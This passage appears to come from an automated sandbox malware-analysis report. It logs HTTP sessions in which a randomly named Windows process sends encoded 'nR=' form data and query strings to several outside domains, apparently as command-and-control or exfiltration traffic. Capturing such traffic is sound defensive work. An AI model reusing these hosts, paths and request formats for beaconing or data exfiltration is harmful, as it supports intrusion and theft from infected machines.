                    14 | 192.168.2.5 | 49727 | 185.173.111.76 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:46.190018892 CEST | 762 | OUT | POST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 56 45 67 31 34 37 62 68 5a 7a 47 2b 72 51 68 34 61 75 57 31 42 4c 2f 36 71 66 44 4d 65 46 44 7a 65 6b 48 39 4e 37 54 4a 35 30 46 47 34 32 78 47 44 33 4a 2f 45 54 37 6b 63 44 66 4e 48 72 42 51 68 50 4c 58 37 4c 52 59 56 6a 49 66 70 6c 6d 51 53 75 62 68 71 66 35 6e 4c 52 4b 75 59 52 42 31 61 31 4d 63 56 68 43 76 58 64 64 62 4f 77 74 4a 58 6e 64 48 6e 6c 69 57 35 73 73 72 71 2b 43 2f 73 39 79 72 58 35 34 34 66 52 55 51 52 75 62 48 32 31 6c 77 72 6a 44 79 6a 70 51 48 78 5a 78 39 79 41 43 4b 62 56 64 66 6b 4b 4f 76 53 43 54 62 32 6c
                    Data Ascii: nR=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQRubH21lwrjDyjpQHxZx9yACKbVdfkKOvSCTb2l
                    Sep 12, 2024 13:03:46.957264900 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:46 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.5 | 49728 | 185.173.111.76 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:48.736520052 CEST | 1779 | OUT | POST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 73 39 7a 73 69 74 73 62 44 61 42 51 78 61 54 6c 65 33 34 48 50 6e 49 51 2f 6c 53 56 56 74 30 73 6d 55 45 64 7a 68 62 75 39 38 4e 35 32 30 43 66 4b 70 42 4a 36 75 43 30 7a 36 62 6a 50 61 42 7a 4d 46 46 79 69 77 6b 50 67 4b 37 58 4a 2f 4e 56 74 65 55 6f 34 4a 49 56 74 58 6e 45 63 36 51 6b 6e 77 75 62 53 30 35 71 6b 4e 34 63 67 37 51 53 77 38 6b 72 32 33 67 39 58 47 2f 33 65 44 76 34 65 45 75 57 31 63 34 47 43 2f 47 31 6a 32 74 31 52 71 39 66 42 65 2f 73 45 32 51 69 36 5a 4d 2b 72 67 48 47 4e [TRUNCATED]
                    Data Ascii: nR=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 [TRUNCATED]
                    Sep 12, 2024 13:03:49.398442030 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:49 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.5 | 49729 | 185.173.111.76 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:51.278351068 CEST | 465 | OUT | GET /lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:51.946367979 CEST | 1230 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:51 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.5 | 49730 | 203.161.43.228 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:57.018244028 CEST | 718 | OUT | POST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 54 58 52 42 62 70 63 6c 30 72 36 43 75 48 66 70 6a 43 41 50 34 65 74 4e 64 64 44 47 4f 6c 48 72 59 79 59 3d
                    Data Ascii: nR=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMTXRBbpcl0r6CuHfpjCAP4etNddDGOlHrYyY=
                    Sep 12, 2024 13:03:57.620933056 CEST | 658 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:57 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.5 | 49731 | 203.161.43.228 | 80 | 4444 | C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:03:59.568510056 CEST | 738 | OUT | POST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 73 33 6f 4e 6c 36 4d 74 69 76 55 47 58 62 47 6c 4e 33 51 73 32 74 45 51 74 2b 31 55 6f 41 65 67 66 30 6b 65 53 64
                    Data Ascii: nR=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwis3oNl6MtivUGXbGlN3Qs2tEQt+1UoAegf0keSd
                    Sep 12, 2024 13:04:00.150923014 CEST | 658 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:00 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49732 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:02.111869097 CEST | 1755 | OUT | POST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=[TRUNCATED]
                    Sep 12, 2024 13:04:02.708224058 CEST | 658 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:02 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49733 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:04.653492928 CEST | 457 | OUT | GET /ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:05.250320911 CEST | 673 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:05 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49734 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 12, 2024 13:04:10.488035917 CEST | 733 | OUT | POST /wjff/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Origin: http://www.qiluqiyuan.buzz
                    Referer: http://www.qiluqiyuan.buzz/wjff/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Ascii: nR=1I9qNX7VLGDrRMCfyZ8aDcHK5NN+F7e2kpOm4LBIfBxNG3O0Cezt5RG8mPNqDTbFAxpYly/MgECYCQn9u5tPFeYEOKt/G+wV03C0xQWfPDt1w/zp39+5at1j0IBRE46Ij8T4ntzoASzjBT7ywhbGDPwoGJ8WHIw8YhNDGzHqzXi0lyNg7T/UV1M+jCZSdM9qsoTmpew=
                    Sep 12, 2024 13:04:11.080820084 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:10 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Sep 12, 2024 13:04:11.080848932 CEST | 370 | IN |


                    Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 49735 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 4444 | Process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    Timestamp | Bytes transferred | Direction | Data
